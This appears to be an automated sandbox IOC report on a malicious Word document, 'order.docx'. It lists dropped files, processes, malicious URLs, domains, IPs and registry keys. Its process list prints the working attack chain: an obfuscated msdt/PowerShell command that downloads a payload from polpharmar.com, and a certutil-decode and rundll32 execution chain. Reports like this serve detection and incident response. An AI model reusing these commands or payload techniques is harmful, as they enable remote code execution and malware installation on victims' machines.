IOC Report
order.docx

loading gif

Files

File Path
Type
Category
Malicious
order.docx
Microsoft Word 2007+
initial sample
malicious
C:\Users\user\AppData\Roaming\POtest.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\kk.txt
ASCII text, with very long lines, with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Roaming\vv.jpg
MS-DOS executable
dropped
malicious
C:\Users\user\Desktop\~$order.docx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\22341FA3-09A5-4979-A468-D40459F9B660
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4A84B4E5.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7081FF7F.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2453x3509, frames 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D61CEBF6.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{360CF632-230F-4183-8699-84ADCB6C3EDE}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9B19E946-E79A-418D-B9B0-6F75274E096A}.tmp
dBase III DBT, version number 0, next free block index 5177357
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\test[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
C:\Users\user\AppData\Local\Temp\3d50mnu3\3d50mnu3.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\3d50mnu3\CSCDC232D29FB9E414B97C7E48E45A16060.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\5wwnjf5w\5wwnjf5w.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\5wwnjf5w\CSC7D879DDA4AF844DBA2BC4075E8CB5965.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES6D3D.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES8FCE.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESAC3F.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\w5csyjot\CSC6CDACC821E67439283A644DCB258474.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\w5csyjot\w5csyjot.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL
XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL
XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL
XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl
XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl
XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Mon Aug 1 16:55:51 2022, mtime=Mon Aug 1 16:57:15 2022, atime=Mon Aug 1 16:57:15 2022, length=0, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:27:52 2022, mtime=Mon Aug 1 16:56:08 2022, atime=Mon Aug 1 16:55:48 2022, length=327439, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
modified
C:\Users\user\AppData\Roaming\Microsoft\Templates\~WRD0000.tmp
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_76dd7df5-21a8-4917-b4ac-b9c30cc4460d\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BDA067BC-A85F-4D09-B1E2-A27A26259E72}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{87FAB0B5-CE0C-4484-80A4-0721760F3A7E}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\test[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14683F8F.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2453x3509, frames 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51B846.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B00ABF75.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp
dBase III DBT, version number 0, next free block index 5177357
dropped
C:\Users\user\AppData\Local\Temp\{502EA169-3BBF-4D41-A8CE-F39114DECA2E}
data
dropped
C:\Users\user\AppData\Local\Temp\{F1216906-4709-45A5-B8F3-741536BBB63B}
data
dropped
There are 57 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/ID PcwdiAgnOSTiC -sKiP forCe -pArAm "IT_ReBRowseforfiLE=#Ja2Y IT_LaunchMethod=ContextMenu IT_BrowseForFile=W5A$(Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkFtRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0LXNMRWVQKDMpO1J1bkRsbDMyLkVYZSBhZHZwQWNLLmRsTCxMYXVuY2hJTkZTZWN0aW9uRXggIiRlTlY6QVBQREFUQVx0ZXN0LmluZiIsREVmQXVsdEluc1RBbGxfU0luZ2xFVVNFciwiJGVOdjpBUFBEQVRBXHRlc3QuaW5mIiw0LDA7U1RvUC1QUm9jRVNTIC1Gb3JDZSAtTmFNZSAnc2RpYWduaG9zdCc='+[CHar]34+'))'))))xW/../../../../../../../../../../../../../../../../.MsI
malicious
C:\Windows\SysWOW64\cmd.exe
C:\WiNDOws\SYsTEm32\cmd.eXe /C MORe /e +32 %apPDAta%\test.inf > %apPDAta%\kk.txt && cErtUtiL.eXE -DeCODeheX %apPDAta%\kk.txt %apPDAta%\vv.jpg && RunDLL32.exe %apPDAta%\vv.jpg,maintest && DEL %apPDAta%\kk.txt && DeL %apPDAta%\vv.jpg && DEl %apPDAta%\test.inf
malicious
C:\Windows\SysWOW64\certutil.exe
cErtUtiL.eXE -DeCODeheX C:\Users\user\AppData\Roaming\kk.txt C:\Users\user\AppData\Roaming\vv.jpg
malicious
C:\Windows\SysWOW64\rundll32.exe
RunDLL32.exe C:\Users\user\AppData\Roaming\vv.jpg,maintest
malicious
C:\Users\user\AppData\Roaming\POtest.exe
C:\Users\user\AppData\Roaming\POtest.exe
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3d50mnu3\3d50mnu3.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FCE.tmp" "c:\Users\user\AppData\Local\Temp\3d50mnu3\CSCDC232D29FB9E414B97C7E48E45A16060.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5csyjot\w5csyjot.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAC3F.tmp" "c:\Users\user\AppData\Local\Temp\w5csyjot\CSC6CDACC821E67439283A644DCB258474.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwnjf5w\5wwnjf5w.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6D3D.tmp" "c:\Users\user\AppData\Local\Temp\5wwnjf5w\CSC7D879DDA4AF844DBA2BC4075E8CB5965.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\more.com
MORe /e +32 C:\Users\user\AppData\Roaming\test.inf
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://polpharmar.com/test.inf
91.235.116.180
malicious
http://polpharmar.com/PO.exe
91.235.116.180
malicious
http://polpharmar.com/test.html
91.235.116.180
malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://store.office.cn/addinstemplate
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
https://management.azure.com/
unknown
https://messaging.lifecycle.office.com/getcustommessage16
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
https://login.windows.net/common/oauth2/authorize
unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://graph.windows.net/
unknown
https://api.powerbi.com/beta/myorg/imports
unknown
https://devnull.onenote.com
unknown
https://messaging.action.office.com/
unknown
https://ncus.pagecontentsync.
unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
unknown
https://messaging.office.com/
unknown
http://polpharmar.com/test.htmlyX
unknown
http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html
unknown
http://polpharmar.com/test.html%
unknown
There are 94 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
polpharmar.com
91.235.116.180
malicious
www.varshtrade.com
91.192.100.12

IPs

IP
Domain
Country
Malicious
91.235.116.180
polpharmar.com
Romania
malicious
192.168.2.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
Type
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
Protocol
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
Version
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
Flags
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
CobaltMajorVersion
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
CobaltMinorVersion
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
MsDavExt
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
WebUrl
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
Expiration
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
EnableBHO
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
Type
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
Protocol
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
Version
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
Flags
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
CobaltMajorVersion
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
CobaltMinorVersion
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
MsDavExt
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
WebUrl
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
Expiration
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com
EnableBHO
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://polpharmar.com/
Expiration
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
j.&
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
k.&
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Wizards
PageSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MailSettings
Template
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
FirstRunOnRTM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
8&&
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2DAC7
2DAC7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
